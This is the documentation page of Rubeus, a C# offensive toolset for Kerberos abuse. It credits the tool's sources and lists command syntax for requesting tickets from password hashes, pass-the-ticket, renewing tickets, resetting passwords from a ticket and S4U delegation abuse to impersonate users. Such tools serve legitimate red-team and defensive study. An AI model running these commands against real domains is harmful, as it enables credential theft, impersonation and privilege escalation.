Rubeus: C# toolset for raw Kerberos interaction and abuses
Rubeus
Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpy’s Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUX’s MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization; without their prior work, this project would not exist.
Rubeus also uses a C# ASN.1 parsing/encoding library from Thomas named DDer that was released with an “MIT-like” license. Huge thanks to Thomas for his clean and stable code!
The KerberosRequestorSecurityToken.GetRequest method for Kerberoasting was contributed to PowerView by @machosec.
Usage

Retrieve a TGT based on a user hash, optionally applying to the current logon session or a specific LUID:
    Rubeus.exe asktgt /user:USER </rc4:HASH | /aes256:HASH> [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ptt] [/luid]
Retrieve a TGT based on a user hash, start a /netonly process, and apply the ticket to the new process/logon session:
    Rubeus.exe asktgt /user:USER </rc4:HASH | /aes256:HASH> /createnetonly:C:\Windows\System32\cmd.exe [/show] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER]
Renew a TGT, optionally applying the ticket or auto-renewing the ticket up to its renew-till limit:
    Rubeus.exe renew </ticket:BASE64 | /ticket:FILE.KIRBI> [/dc:DOMAIN_CONTROLLER] [/ptt] [/autorenew]
Reset a user’s password from a supplied TGT (AoratoPw):
    Rubeus.exe changepw </ticket:BASE64 | /ticket:FILE.KIRBI> /new:PASSWORD [/dc:DOMAIN_CONTROLLER]
Retrieve a service ticket for one or more SPNs, optionally applying the ticket:
    Rubeus.exe asktgs </ticket:BASE64 | /ticket:FILE.KIRBI> </service:SPN1,SPN2,…> [/dc:DOMAIN_CONTROLLER] [/ptt]
Perform S4U constrained delegation abuse:
    Rubeus.exe s4u </ticket:BASE64 | /ticket:FILE.KIRBI> /impersonateuser:USER /msdsspn:SERVICE/SERVER [/altservice:SERVICE] [/dc:DOMAIN_CONTROLLER] [/ptt]
    Rubeus.exe s4u /user:USER </rc4:HASH | /aes256:HASH> [/domain:DOMAIN] /impersonateuser:USER /msdsspn:SERVICE/SERVER [/altservice:cifs,HOST,…] [/dc:DOMAIN_CONTROLLER] [/ptt]
Submit a TGT, optionally targeting a specific LUID (if elevated):
    Rubeus.exe ptt </ticket:BASE64 | /ticket:FILE.KIRBI> [/luid:LOGINID]
Copyright (c) 2018, Will Schroeder
All rights reserved.